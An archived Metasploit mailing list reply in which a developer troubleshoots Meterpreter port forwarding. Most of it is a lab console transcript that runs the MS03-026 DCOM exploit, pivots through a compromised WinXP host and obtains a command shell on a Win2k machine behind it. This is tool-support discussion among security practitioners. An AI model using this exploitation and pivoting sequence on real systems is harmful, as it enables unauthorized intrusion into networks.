Metasploit mailing list archives
use of meterpreter (copy for the list )
From: mmiller at hick.org (mmiller at hick.org)
Date: Wed, 20 Apr 2005 02:20:02 -0500
On Wed, Apr 20, 2005 at 08:01:13AM +0200, Thomas Werth wrote:
using single portforward explonation works. (i didn't use 3rd Party tool instead i used reverse explonation direct to attacking host ) i hope you'll find that bug, if i can help send me "special" version and i'll supply detailed output.
I tried to reproduce this tonight and wasn't successful. In my test network I had to create an SSH tunnel to forward the exploitation to the initial box, but that shouldn't factor into this issue. Here's the way things were set up: SSH tunnels: ------------ 127.0.0.1:9000 forwarded to 192.168.64.128:135 (WinXP proxy) 127.0.0.1:4444 forwarded to 192.168.64.128:4444 (WinXP proxy) Meterpreter tunnels: 127.0.0.1:5000 forwarded to 192.168.64.132:135 (Win2k behind WinXP) 127.0.0.1:5001 forwarded to 192.168.64.132:5001 (Win2k behind WinXP) In my test network I was unable to communicate directly with the Win2k box, so I had to go through the WinXP box (via meterpreter). Metasploit instance #1: ----------------------- msf > use msrpc_dcom_ms03_026 msf msrpc_dcom_ms03_026(win32_bind_meterpreter) > set LPORT: 4444 PAYLOAD: win32_bind_meterpreter RHOST: 127.0.0.1 RPORT: 8000 msf msrpc_dcom_ms03_026(win32_bind_meterpreter) > exploit [*] Starting Bind Handler. [*] Connected to REMACT with group ID 0x6836 [*] Got connection from 127.0.0.1:57312 <-> 127.0.0.1:4444 [*] Sending Stage (2834 bytes) [*] Sleeping before sending dll. [*] Uploading dll to memory (69643), Please wait... [*] Upload completed meterpreter> [ -= connected to =- ] [ -= meterpreter server =- ] [ -= v. 00000500 =- ] meterpreter> use -m Net loadlib: Loading library from 'ext556839.dll' on the remote machine. meterpreter> loadlib: success. meterpreter> portfwd -a -l 5000 -h 192.168.64.132 -p 135 portfwd: Successfully created local listener on port 5000. ... wait for instance #2 to display 'Connected to REMACT...' ... meterpreter> portfwd -a -l 5001 -h 192.168.64.132 -p 5001 portfwd: Successfully created local listener on port 5001. meterpreter> Metasploit instance #2: ----------------------- msf > use msrpc_dcom_ms03_026 msf msrpc_dcom_ms03_026(win32_bind) > set RHOST 127.0.0.1 RHOST -> 127.0.0.1 msf msrpc_dcom_ms03_026(win32_bind) > set RPORT 5000 RPORT -> 5000 msf msrpc_dcom_ms03_026(win32_bind) > set LPORT 5001 LPORT -> 5001 msf msrpc_dcom_ms03_026(win32_bind) > set LPORT: 5001 PAYLOAD: win32_bind RHOST: 127.0.0.1 RPORT: 5000 msf msrpc_dcom_ms03_026(win32_bind) > exploit [*] Starting Bind Handler. [*] Connected to REMACT with group ID 0xba20 ... created portfwd on 5001 in instance #1 ... [*] Got connection from 127.0.0.1:40577 <-> 127.0.0.1:5001 Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-1999 Microsoft Corp. C:\WINNT\system32> As far as I can tell this seems to be nearly (if not exactly the same thing) as what you tried, so I'm not sure why you would being having a different experience than that which I'm having. My only guess is that you are creating the connection handler port forward too soon, thus causing the bind handler to establish before the exploit actually finishes. I figure we should probably take this thread off-list soon as I imagine people are probably tired of seeing our spam :) Let me know if the above output helps at all...
Current thread:
- use of meterpreter (copy for the list ), (continued)
- use of meterpreter (copy for the list ) mmiller at hick.org (Apr 15)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 15)
- use of meterpreter (copy for the list ) mmiller at hick.org (Apr 15)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 18)
- use of meterpreter (copy for the list ) mmiller at hick.org (Apr 18)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 18)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 18)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 19)
- use of meterpreter (copy for the list ) mmiller at hick.org (Apr 19)
- use of meterpreter (copy for the list ) Thomas Werth (Apr 19)
- use of meterpreter (copy for the list ) mmiller at hick.org (Apr 20)